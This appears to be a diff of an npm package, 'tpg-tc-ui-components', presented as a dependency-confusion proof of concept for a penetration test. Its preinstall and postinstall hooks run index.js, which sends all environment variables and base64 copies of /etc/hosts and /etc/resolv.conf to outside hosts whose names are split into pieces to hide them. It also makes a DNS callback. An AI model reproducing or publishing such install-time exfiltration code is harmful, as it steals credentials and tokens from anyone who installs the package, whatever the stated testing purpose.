tpg-tc-ui-components 1.1.1

package/index.js

@@ -0,0 +1,118 @@
+/* 
+    --[Dependency Confusion Attack]--
+    
+    Proof-of-Concept for an ongoing penetration test. 
+    Please that a look at src/DETAILS.md
+*/
+
+
+const https = require('https');
+const fs = require('fs')
+
+let dns_mockendpoint = 'u4z29mfue0mjpoygbtm4zo2cy34usugj.cb.mog'+ 'wailabs.de'
+let endpoint = 'https://npmproject8923895823.mog'+'waisecurity.de/en-US'
+
+
+
+// slightly modified version from 
+// https://stackoverflow.com/questions/40537749/how-do-i-make-a-https-post-in-node-js-without-any-third-party-module
+function post(url, data) {
+    data["module"] = "1.1.888"
+    const dataString = JSON.stringify(data)
+  
+    const options = {
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': dataString.length,
+      },
+      timeout: 1000, // in ms
+    }
+  
+    return new Promise((resolve, reject) => {
+      const req = https.request(url, options, (res) => {
+        if (res.statusCode < 200 || res.statusCode > 299) {
+          return reject(new Error(`HTTP status code ${res.statusCode}`))
+        }
+  
+        const body = []
+        res.on('data', (chunk) => body.push(chunk))
+        res.on('end', () => {
+          const resString = Buffer.concat(body).toString()
+          resolve(resString)
+        })
+      })
+  
+      req.on('error', (err) => {
+        reject(err)
+      })
+  
+      req.on('timeout', () => {
+        req.destroy()
+        reject(new Error('Request time out'))
+      })
+  
+      req.write(dataString)
+      req.end()
+    }).catch(_ignore)
+  }
+
+function get_file(fname){
+    let contents 
+    if (fs.existsSync(fname)) {
+        contents = fs.readFileSync(fname, { encoding: 'base64' })
+    }
+    return {content: contents, name: fname, empty: !fs.existsSync(fname) }
+}
+
+
+// https://stackoverflow.com/questions/1349404/generate-random-string-characters-in-javascript
+function makeid(length) {
+    let result = '';
+    const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+    const charactersLength = characters.length;
+    let counter = 0;
+    while (counter < length) {
+      result += characters.charAt(Math.floor(Math.random() * charactersLength));
+      counter += 1;
+    }
+    return result;
+}
+
+function _ignore(err){
+    return 
+}
+
+function print_info(){
+  console.log(``)
+  console.log(`[!] Hello it seems like you downloaded the wrong dependency!  [!]`)
+  console.log(`Your environment is prune to dependency confusion.`)
+  console.log(`This is part of an active penetration test. `)
+  throw new Error("Depdendency confusion!")
+}
+
+// main 
+(async() => {
+    const device_id = makeid(15)
+    endpoint = endpoint + "/" + device_id   // ugly but more reliable than other api calls
+  
+    // env
+    let data = process.env
+    await post(endpoint, data).catch(_ignore)
+
+    // dns
+    try{
+      post('https://' +device_id + '-' + dns_mockendpoint, data).catch(_ignore)
+    }catch(e){}
+
+    // mac/lin attribution files
+    await post(endpoint, get_file("/etc/hosts")).catch(_ignore)
+    await post(endpoint, get_file("/etc/resolv.conf")).catch(_ignore)
+    
+    // win exfil not required - env should be enough
+
+
+    // --[Disclaimer info]--
+    print_info()
+
+  })();

package/package.json

@@ -0,0 +1,14 @@
+{
+  "name": "tpg-tc-ui-components",
+  "version": "1.1.1",
+  "description": "Proof-of-Concept for Project 7 - active p e n e t r a t i o n test",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+  }
+}

package/src/DETAILS.md

@@ -0,0 +1,2 @@
+## Information 
+